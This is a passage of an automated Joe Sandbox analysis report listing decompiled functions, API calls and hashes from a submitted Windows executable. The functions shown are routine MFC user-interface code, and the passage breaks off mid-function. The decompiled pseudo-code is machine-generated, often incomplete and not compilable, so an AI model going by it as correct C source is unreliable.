    • Source File: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: ErrorLast$#823ByteCharMultiWidewcslen
    • String ID:
    • API String ID: 902154227-0
    • Opcode ID: 6951ab322b17c5da87c9fe049f9dd89af28fe3ae4bd12f589731f3ad1ac7a054
    • Instruction ID: dde1a227914c0c28cf223384fd86ab6a4fa66e8aeb10397f98373f6165d84f81
    • Opcode Fuzzy Hash: 6951ab322b17c5da87c9fe049f9dd89af28fe3ae4bd12f589731f3ad1ac7a054
    • Instruction Fuzzy Hash: 05F028622061597D9620B3775C85F3BBA8CDE8D3B9F15163FF111D21C1D91DAC01867D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 41%
    			E004105D6(intOrPtr* __eax) {
    				intOrPtr* _v8;
    				void* _v12;
    				intOrPtr* _t16;
    				intOrPtr _t17;
    				void* _t18;
    				void* _t21;
    				void* _t27;
    				void* _t28;
    				void* _t30;
    				intOrPtr _t32;
    				intOrPtr _t34;
    
    				_t16 = __eax;
    				_t28 = _t21;
    				L0043DD54();
    				 *((intOrPtr*)(__eax + 4)) = 0;
    				 *((intOrPtr*)(__eax + 0x38)) = 1;
    				_v8 = __eax;
    				__imp__??0_Lockit@std@@QAE@XZ(0x40, _t27, _t30, _t18, _t21, _t21);
    				_t34 =  *0x4553c0; // 0x2acaa0
    				if(_t34 == 0) {
    					 *0x4553c0 = __eax;
    					 *__eax = 0;
    					_t16 =  *0x4553c0; // 0x2acaa0
    					_v8 = 0;
    					 *((intOrPtr*)(_t16 + 8)) = 0;
    				}
    				 *0x4553c4 =  *0x4553c4 + 1;
    				__imp__??1_Lockit@std@@QAE@XZ();
    				if(_v8 != 0) {
    					_push(_v8);
    					L0043DD42();
    				}
    				_t32 =  *0x4553c0; // 0x2acaa0
    				_push(0x40);
    				L0043DD54();
    				 *((intOrPtr*)(_t16 + 4)) = _t32;
    				 *((intOrPtr*)(_t16 + 0x38)) = 0;
    				 *((intOrPtr*)(_t28 + 4)) = _t16;
    				 *((intOrPtr*)(_t28 + 0xc)) = 0;
    				 *_t16 = _t16;
    				_t17 =  *((intOrPtr*)(_t28 + 4));
    				 *((intOrPtr*)(_t17 + 8)) = _t17;
    				return _t17;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #823Lockit@std@@$#825??0_??1_
    • String ID:
    • API String ID: 2469163743-0
    • Opcode ID: ccc11db60c916be39a3b7c3e0c21070b077868423c4633142c0e02644440344f
    • Instruction ID: 41cdc837c15b9bae48bfe4c3ba374e0c96f3df02f8a16bb178822cc9ba3b3930
    • Opcode Fuzzy Hash: ccc11db60c916be39a3b7c3e0c21070b077868423c4633142c0e02644440344f
    • Instruction Fuzzy Hash: A41135B1800704EFC700DF9AE9869A9BBF4FF48315B6190BFE50997261D7B4A990CF48
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E0043EA3C(void* __ecx, CHAR* _a4) {
    				void* _v12;
    				int _t11;
    				signed int _t13;
    				void* _t16;
    				short* _t17;
    				int _t19;
    				short* _t21;
    
    				_t16 = __ecx;
    				if(_a4 != 0) {
    					_t19 = lstrlenA(_a4) + 1;
    					E0043E690(_t19 + _t19 + 0x00000003 & 0x000000fc, _t16);
    					_t17 = _t21;
    					 *_t17 =  *_t17 & 0x00000000;
    					_t11 = MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t17, _t19);
    					if(_t11 == 0) {
    						if(GetLastError() == 0) {
    							_t13 = 0;
    						} else {
    							_t13 = GetLastError() & 0x0000ffff | 0x80070000;
    						}
    						_t11 = E0043E9F0(_t13);
    					}
    					__imp__#2(_t17);
    				} else {
    					_t11 = 0;
    				}
    				return _t11;
    			}

    APIs
    • lstrlenA.KERNEL32(00000000,00000000,00000000,?,004096C1,?,?,0040966E,?,?,?,00429CB7), ref: 0043EA4E
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001,?,004096C1,?,?,0040966E,?,?,?,00429CB7), ref: 0043EA75
    • GetLastError.KERNEL32(?,00000001,?,004096C1,?,?,0040966E,?,?,?,00429CB7), ref: 0043EA85
    • GetLastError.KERNEL32(?,00000001,?,004096C1,?,?,0040966E,?,?,?,00429CB7), ref: 0043EA8B
    • SysAllocString.OLEAUT32 ref: 0043EAA2
    Memory Dump Source
    • Source File: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: ErrorLast$AllocByteCharMultiStringWidelstrlen
    • String ID:
    • API String ID: 4196186757-0
    • Opcode ID: 0963cad40e0ed44314d6884b511ae66769e57e99f10d636e2d25e181fd8d1d50
    • Instruction ID: b22f9b5e660da52314e6c4045fb90c762401d17fb4cdc2ee7219b268a41ed0d6
    • Opcode Fuzzy Hash: 0963cad40e0ed44314d6884b511ae66769e57e99f10d636e2d25e181fd8d1d50
    • Instruction Fuzzy Hash: 9E012D32541116F7C7106B62CC06BAB3F9CFF56372F244532F900D11D0E738955196AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0040D958(void* __ecx) {
    				intOrPtr* _t19;
    				intOrPtr _t20;
    				void* _t23;
    				void* _t31;
    				intOrPtr* _t34;
    				void* _t36;
    
    				_t19 = E0043E4E0(0x440026, _t36);
    				_push(__ecx);
    				_t31 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
    					_push(0x10);
    					L0043DD54();
    					_t34 = _t19;
    					 *((intOrPtr*)(_t36 - 0x10)) = _t34;
    					 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
    					if(_t34 == 0) {
    						_t34 = 0;
    					} else {
    						L0043DDD8();
    					}
    					_t20 =  *((intOrPtr*)(_t36 + 8));
    					_push( *((intOrPtr*)(_t36 + 0xc)));
    					 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
    					 *_t34 = _t20;
    					 *((intOrPtr*)(_t34 + 4)) =  *((intOrPtr*)(_t20 + 0x60));
    					L0043DDD2();
    					_push(_t34);
    					 *((intOrPtr*)(_t34 + 8)) =  *((intOrPtr*)(_t36 + 0x10));
    					_push( *((intOrPtr*)(_t31 + 0x47c)));
    					L0043E204();
    					_t23 = 1;
    				} else {
    					_t23 = 0;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
    				return _t23;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540#5860#823#860H_prolog
    • String ID:
    • API String ID: 2914896502-0
    • Opcode ID: 530de2f10ea31f1e891b6560cbcc4a802a21dd5f40e5638b98f38172b6202b7b
    • Instruction ID: 9692d2e4db55e420b5c6508e883a1f9dfd1c7a9cd8cf610db0b3766a229735e1
    • Opcode Fuzzy Hash: 530de2f10ea31f1e891b6560cbcc4a802a21dd5f40e5638b98f38172b6202b7b
    • Instruction Fuzzy Hash: 2A019E72900615EFCB14DFA9C401BAAF7A4FF08324F10862FE4AA972D1D778A905CB84
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00428EEB(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, CHAR* _a16, intOrPtr _a20) {
    				struct _OSVERSIONINFOA _v152;
    				intOrPtr _v156;
    				char _v220;
    				intOrPtr _v224;
    				char _v480;
    				struct _NOTIFYICONDATAA _v640;
    				int _t23;
    
    				_v152.dwOSVersionInfoSize = 0x94;
    				_t23 = GetVersionExA( &_v152);
    				if((_v152.dwPlatformId & 0x00000002) != 0 && _v152.dwMajorVersion >= 5) {
    					memset( &_v640, 0, 0x1e8);
    					_v640.hWnd = _a4;
    					_v640.cbSize = 0x1e8;
    					_v640.uFlags = 0x10;
    					lstrcpyA( &_v220, _a12);
    					_v156 = _a20;
    					_v640.uID = _a8;
    					lstrcpynA( &_v480, _a16, 0x100);
    					_v224 = 0x61a8;
    					return Shell_NotifyIconA(1,  &_v640);
    				}
    				return _t23;
    			}

    APIs
    • GetVersionExA.KERNEL32(?), ref: 00428F05
    • memset.MSVCRT ref: 00428F33
    • lstrcpyA.KERNEL32(?,?), ref: 00428F62
    • lstrcpynA.KERNEL32(?,?,00000100), ref: 00428F89
    • Shell_NotifyIconA.SHELL32(00000001,000001E8), ref: 00428FA2
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: IconNotifyShell_Versionlstrcpylstrcpynmemset
    • String ID:
    • API String ID: 1460148752-0
    • Opcode ID: f16d3d705827ca840b0987156a625c11a61141ed72b04443a3149f54354d7591
    • Instruction ID: fd571d6783c02558b4a0538d330973a157ad3ba4aeb0828cb2ae7e93ed09fba3
    • Opcode Fuzzy Hash: f16d3d705827ca840b0987156a625c11a61141ed72b04443a3149f54354d7591
    • Instruction Fuzzy Hash: 4A11E87490525D9FDF20DF70DD4EBCDBBB8AF09309F0041D6A90CA6291D7749A988F54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E004100B0(intOrPtr __ecx) {
    				intOrPtr* _t37;
    				void* _t42;
    
    				E0043E4E0(0x440491, _t42);
    				_push(__ecx);
    				_t37 =  *((intOrPtr*)(_t42 + 8));
    				 *((intOrPtr*)(_t42 - 0x10)) = __ecx;
    				 *((intOrPtr*)(__ecx)) =  *_t37;
    				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t37 + 4));
    				_push(_t37 + 8);
    				L0043DD3C();
    				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
    				_push(_t37 + 0xc);
    				L0043DD3C();
    				_push(_t37 + 0x10);
    				 *(_t42 - 4) = 1;
    				L0043DD3C();
    				_push(_t37 + 0x14);
    				 *(_t42 - 4) = 2;
    				L0043DD3C();
    				 *((intOrPtr*)(__ecx + 0x18)) =  *((intOrPtr*)(_t37 + 0x18));
    				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
    				return __ecx;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 004100B5
    • #535.MFC42(?,?,?,?,0040FFD8,00000000), ref: 004100D6
    • #535.MFC42(?,?,?,?,?,0040FFD8,00000000), ref: 004100E6
    • #535.MFC42(?,?,?,?,?,?,0040FFD8,00000000), ref: 004100F6
    • #535.MFC42(?,?,?,?,?,?,?,0040FFD8,00000000), ref: 00410106
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #535$H_prolog
    • String ID:
    • API String ID: 3656073097-0
    • Opcode ID: 328fb0151820b0e9066c120224fc1e02d12cffe3875250715e9f7c73de0e61ba
    • Instruction ID: fcbdd0bd631b91396e00796e33d1daeececc5d6dc286f47a461feb27ecf99cd6
    • Opcode Fuzzy Hash: 328fb0151820b0e9066c120224fc1e02d12cffe3875250715e9f7c73de0e61ba
    • Instruction Fuzzy Hash: 4F014C72A00606AFC710DF59D440A9AF7F8FF18314F008A2FA05AC3641D778FA48CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E0041BFC6(intOrPtr* __ecx) {
    				void* __esi;
    				void* _t18;
    				void* _t19;
    				intOrPtr* _t34;
    				void* _t36;
    
    				E0043E4E0(0x441613, _t36);
    				_push(__ecx);
    				_push( *((intOrPtr*)(_t36 + 8)));
    				_t34 = __ecx;
    				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
    				_push(0xab);
    				L0043E054();
    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
    				_t18 = E0040E07A(__ecx + 0x60);
    				 *(_t36 - 4) = 1;
    				L0043DDD8();
    				 *(_t36 - 4) = 2;
    				L0043DDD8();
    				 *(_t36 - 4) = 3;
    				_t19 = L00404F04(_t18, __ecx + 0xd8, __ecx);
    				 *(_t36 - 4) = 4;
    				L00404F04(_t19, _t34 + 0x12c, _t34);
    				_push(0x4550cc);
    				 *(_t36 - 4) = 5;
    				 *_t34 = 0x448560;
    				L0043DDD2();
    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
    				return _t34;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041BFCB
    • #324.MFC42(000000AB,?), ref: 0041BFE0
      • Part of subcall function 0040E07A: __EH_prolog.LIBCMT ref: 0040E07F
      • Part of subcall function 0040E07A: #567.MFC42(?,?,0040D2FA), ref: 0040E08B
      • Part of subcall function 0040E07A: #540.MFC42(?,?,0040D2FA), ref: 0040E09D
      • Part of subcall function 0040E07A: #540.MFC42 ref: 0040E0C7
      • Part of subcall function 0040E07A: GetSysColor.USER32(0000000F), ref: 0040E0D4
    • #540.MFC42(000000AB,?), ref: 0041BFFB
    • #540.MFC42(000000AB,?), ref: 0041C00C
    • #860.MFC42(004550CC), ref: 0041C040
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540$H_prolog$#324#567#860Color
    • String ID:
    • API String ID: 481706643-0
    • Opcode ID: 478f0ffa66c878ada9f358f2c3903f9512d8b644e57217629787ea91e1285442
    • Instruction ID: 35b1751f940c5f2095f2a3774c6b2aa1559b3d991bee5715f9affc5d5d638404
    • Opcode Fuzzy Hash: 478f0ffa66c878ada9f358f2c3903f9512d8b644e57217629787ea91e1285442
    • Instruction Fuzzy Hash: 9B018470A01244DEDB15EBA6C5057DEFBB0AFA5318F00445FE696632C2CBB81608C76A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E0041F2DA(void* __ecx) {
    				void* __esi;
    				void* _t3;
    				void* _t4;
    				long _t5;
    				void* _t7;
    				void* _t13;
    				void* _t14;
    				int _t16;
    
    				_t13 = __ecx;
    				L0043DF94();
    				_t4 = L004044C9(_t3, __ecx, _t14);
    				_push(0x43b);
    				_t16 = _t4 + 0x6c;
    				L0043E066();
    				if(_t16 != 0) {
    					_t16 =  *(_t16 + 4);
    				}
    				_t5 = SendMessageA( *(_t4 + 0x20), 0x30, _t16, 1);
    				_push(1);
    				_push(0x47d);
    				L0043DF82();
    				_push(1);
    				_push(0x487);
    				L0043DF82();
    				E0041F337(_t5, _t13);
    				_t7 = 1;
    				return _t7;
    			}

    APIs
    • #4710.MFC42 ref: 0041F2DE
    • #3092.MFC42(0000043B), ref: 0041F2F4
    • SendMessageA.USER32(?,00000030,-0000006C,00000001), ref: 0041F308
    • #1779.MFC42(0000047D,00000001), ref: 0041F317
    • #1779.MFC42(00000487,00000001,0000047D,00000001), ref: 0041F325
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1779$#3092#4710MessageSend
    • String ID:
    • API String ID: 292299062-0
    • Opcode ID: 70e4a4adccebd6547ae799c451a248c2afe3d9dd530d97ab78144533cd5bd842
    • Instruction ID: 7c94c86f7eb621372b1377927aa9f10239edbfc26c5faeb636d77ff37fa737eb
    • Opcode Fuzzy Hash: 70e4a4adccebd6547ae799c451a248c2afe3d9dd530d97ab78144533cd5bd842
    • Instruction Fuzzy Hash: EEE0EDB2B5122027E83533626C93FBE05138FC4B18F0A002BFB062F2D1CED99D424289
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E0041A0A5(void* __ecx) {
    				int _t5;
    				void* _t12;
    
    				_t12 = __ecx;
    				_push(1);
    				L0043E08A();
    				_t5 = strcmp( *(__ecx + 0xdc),  *(__ecx + 0x64));
    				if(_t5 == 0) {
    					_t5 = strcmp( *(_t12 + 0xd8),  *(_t12 + 0xe0));
    					if(_t5 == 0) {
    						L0043E03C();
    						return _t5;
    					} else {
    						_push(0xffffffff);
    						_push(0x10);
    						_push(0xe068);
    						goto L4;
    					}
    				} else {
    					_push(0xffffffff);
    					_push(0x10);
    					_push(0xe067);
    					L4:
    					L0043E2CA();
    					return _t5;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: strcmp$#1199#4853#6334
    • String ID:
    • API String ID: 3365883101-0
    • Opcode ID: ab57daf36217411fd670f391281d99e2630dbeb7d7e6342d3e923b385cdc56f3
    • Instruction ID: 0cbf19dd84620dd64f4d96e116e9476608f520a026216bf769175bfb154605c8
    • Opcode Fuzzy Hash: ab57daf36217411fd670f391281d99e2630dbeb7d7e6342d3e923b385cdc56f3
    • Instruction Fuzzy Hash: 48E09B3124671269EA3826A7FC03FDE26515F0C734F24460FF165755E19DC51CE1515D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 18%
    			E0040D567(void* __ecx, intOrPtr _a4) {
    				void* _t9;
    				intOrPtr _t11;
    
    				_t11 = _a4;
    				_push(__ecx + 0x60);
    				_push(0x429);
    				_push(_t11);
    				L0043DF7C();
    				_push(__ecx + 0x174);
    				_push(0x428);
    				_push(_t11);
    				L0043DF7C();
    				_push(__ecx + 0x288);
    				_push(0x5361);
    				_push(_t11);
    				L0043DF7C();
    				_t9 = __ecx + 0x434;
    				_push(_t9);
    				_push(0x535f);
    				_push(_t11);
    				L0043DF7C();
    				_push(__ecx + 0x3c4);
    				_push(0x5360);
    				_push(_t11);
    				L0043DF7C();
    				return _t9;
    			}

    APIs
    • #2302.MFC42(?,00000429,?), ref: 0040D579
    • #2302.MFC42(?,00000428,?,?,00000429,?), ref: 0040D58B
    • #2302.MFC42(?,00005361,?,?,00000428,?,?,00000429,?), ref: 0040D59D
    • #2302.MFC42(?,0000535F,?,?,00005361,?,?,00000428,?,?,00000429,?), ref: 0040D5AF
    • #2302.MFC42(?,00005360,?,?,0000535F,?,?,00005361,?,?,00000428,?,?,00000429,?), ref: 0040D5C1
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2302
    • String ID:
    • API String ID: 735948377-0
    • Opcode ID: d07e4eec7fae75a0b86c9c2bbb2f0707b385985b235daf9cdc7132c76b0545fc
    • Instruction ID: cc6e1eb8ec5c7f8ec581e0b152e1a4ef95de4e2a510ad9941e823d21f38d845d
    • Opcode Fuzzy Hash: d07e4eec7fae75a0b86c9c2bbb2f0707b385985b235daf9cdc7132c76b0545fc
    • Instruction Fuzzy Hash: 78F06CF25419043BE211A111ACC2DFBA3ACDB8DB54F44541FB74595091D7E8790587B5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 18%
    			E00419607(void* __ecx, intOrPtr _a4) {
    				void* _t9;
    				intOrPtr _t11;
    
    				_t11 = _a4;
    				_push(__ecx + 0x178);
    				_push(0x421);
    				_push(_t11);
    				L0043E060();
    				_push(__ecx + 0x17c);
    				_push(0x422);
    				_push(_t11);
    				L0043E060();
    				_push(__ecx + 0x180);
    				_push(0x423);
    				_push(_t11);
    				L0043E060();
    				_t9 = __ecx + 0x108;
    				_push(_t9);
    				_push(0x5360);
    				_push(_t11);
    				L0043DF7C();
    				_push(__ecx + 0x184);
    				_push(0x424);
    				_push(_t11);
    				L0043E060();
    				return _t9;
    			}

    APIs
    • #2301.MFC42(?,00000421,?), ref: 0041961C
    • #2301.MFC42(?,00000422,?,?,00000421,?), ref: 0041962E
    • #2301.MFC42(?,00000423,?,?,00000422,?,?,00000421,?), ref: 00419640
    • #2302.MFC42(?,00005360,?,?,00000423,?,?,00000422,?,?,00000421,?), ref: 00419652
    • #2301.MFC42(?,00000424,?,?,00005360,?,?,00000423,?,?,00000422,?,?,00000421,?), ref: 00419664
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2301$#2302
    • String ID:
    • API String ID: 4116190679-0
    • Opcode ID: 33eb0ddf66b3c8ede4c9cfb6a11646df1022d36fd4d6931750a9d1accd2da21a
    • Instruction ID: 9683153a0dbcd9614c82a850ff524cf1c26ec1a8d65116a920ac6d3c3b0717c7
    • Opcode Fuzzy Hash: 33eb0ddf66b3c8ede4c9cfb6a11646df1022d36fd4d6931750a9d1accd2da21a
    • Instruction Fuzzy Hash: F5F06CB22415187DF125A522CC82FFB52BCDB9DB14F80881FB754A50C1DBE869454679
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041AD8D(struct HWND__* _a4) {
    				int _t2;
    				struct HWND__* _t6;
    
    				_t6 = _a4;
    				_t2 = GetDlgCtrlID(_t6);
    				if(_t2 == 0xd6da || _t2 == 0xd6db || _t2 == 0xd6dc || _t2 == 0xd6dd) {
    					_t2 = GetWindowTextLengthA(_t6);
    					if(_t2 >= 4) {
    						return SetFocus(GetNextDlgTabItem(GetParent(_t6), _t6, 0));
    					}
    				}
    				return _t2;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: CtrlFocusItemLengthNextParentTextWindow
    • String ID:
    • API String ID: 3675597510-0
    • Opcode ID: 024e9b85bd7583c0e32bdab13838abb9056b8b76b3db7362e221bc6f8bbaa228
    • Instruction ID: 2711c6cc8565d3d297ed7496bcb5e88ac813f6f566d669ca9248150f8e652afe
    • Opcode Fuzzy Hash: 024e9b85bd7583c0e32bdab13838abb9056b8b76b3db7362e221bc6f8bbaa228
    • Instruction Fuzzy Hash: FCE092785038106BDA2017B4BC0C6CF366BEB8B312F100423F006D18A4CB2D88C056AF
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0041BEC8(signed int __eax, void* __ecx) {
    				void* _t10;
    
    				_push(0x473);
    				L0043DFA6();
    				asm("sbb esi, esi");
    				_t10 =  ~__eax + 1;
    				_push(_t10);
    				_push(0x497);
    				L0043E066();
    				L0043E07E();
    				_push(_t10);
    				_push(0x496);
    				L0043E066();
    				L0043E07E();
    				return __eax;
    			}

    APIs
    • #4055.MFC42(00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F), ref: 0041BED1
    • #3092.MFC42(00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470), ref: 0041BEE5
    • #2642.MFC42(00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470), ref: 0041BEEC
    • #3092.MFC42(00000496,00000001,00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473), ref: 0041BEF9
    • #2642.MFC42(00000496,00000001,00000497,00000001,00000473,?,?,0041BC87,0000047C,0000047D,?,00000497,?,00000474,?,00000473), ref: 0041BF00
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2642#3092$#4055
    • String ID:
    • API String ID: 2023933615-0
    • Opcode ID: 3094432343f1e68286e43dad7039a6e3512b43301af6399fbf76318f2f400694
    • Instruction ID: 979f71807a3120244b98ad0fc391a7c8c540084a71a0e6cafe3bd34ae2c53b15
    • Opcode Fuzzy Hash: 3094432343f1e68286e43dad7039a6e3512b43301af6399fbf76318f2f400694
    • Instruction Fuzzy Hash: ABD0121174613053A93C32B76D1AA6F0856CFC9A74F05112E72469B1C1ECD80D0241AC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E0040F706(signed int* __ecx) {
    				void* _t23;
    
    				E0043E4E0(0x440381, _t23);
    				_push(__ecx);
    				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
    				L0043DDD8();
    				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
    				L0043DDD8();
    				 *(_t23 - 4) = 1;
    				L0043DDD8();
    				 *(_t23 - 4) = 2;
    				L0043DDD8();
    				 *__ecx =  *__ecx & 0x00000000;
    				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
    				return __ecx;
    			}

    Instruction addresses: 0x0040f70b, 0x0040f710, 0x0040f714, 0x0040f71a, 0x0040f71f, 0x0040f726, 0x0040f72e, 0x0040f732, 0x0040f73a, 0x0040f73e, 0x0040f746, 0x0040f74c, 0x0040f754

    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540$H_prolog
    • String ID:
    • API String ID: 385474894-0
    • Opcode ID: 118e89c8bd656a0ee7c45cd921d03e2f783d5cda2873ab6cdd36c1375bc453fa
    • Instruction ID: 7f3fff88c9a6060fc7e01f34a5421d34d59acfc9c68e3b90631fc1fac2de6346
    • Opcode Fuzzy Hash: 118e89c8bd656a0ee7c45cd921d03e2f783d5cda2873ab6cdd36c1375bc453fa
    • Instruction Fuzzy Hash: E6F0A071C00610CBCB26EF96E4027EDB7F4AF18308F00895EA053936D2CBB86A08C7A5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E0040F755(intOrPtr __ecx) {
    				void* _t14;
    				void* _t24;
    
    				_t14 = E0043E4E0(0x4403ad, _t24);
    				_push(__ecx);
    				 *((intOrPtr*)(_t24 - 0x10)) = __ecx;
    				 *(_t24 - 4) = 2;
    				L0043DD36();
    				 *(_t24 - 4) = 1;
    				L0043DD36();
